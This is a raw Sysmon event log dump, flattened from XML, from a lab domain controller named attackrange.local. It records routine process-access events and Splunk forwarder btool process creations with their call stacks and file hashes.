13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003734Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003733Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4326-6000-C400-000000009A01}28563712C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{08A6967A-4326-6000-C500-000000009A01}3280C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003732Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.119{08A6967A-4326-6000-C500-000000009A01}3280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4326-6000-C400-000000009A01}2856C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000003731Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4326-6000-C400-000000009A01}2856C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003730Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003729Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003728Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003727Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003726Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003725Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003724Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003723Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003722Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003721Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4326-6000-C400-000000009A01}2856C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003720Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4326-6000-C300-000000009A01}50004428C:\Windows\system32\cmd.exe{08A6967A-4326-6000-C400-000000009A01}2856C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003719Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.112{08A6967A-4326-6000-C400-000000009A01}2856C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-4326-6000-C300-000000009A01}5000C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000003718Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4326-6000-C300-000000009A01}5000C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003717Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003716Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003715Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003714Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003713Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003712Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003711Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003710Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003709Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003708Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4326-6000-C300-000000009A01}5000C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003707Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 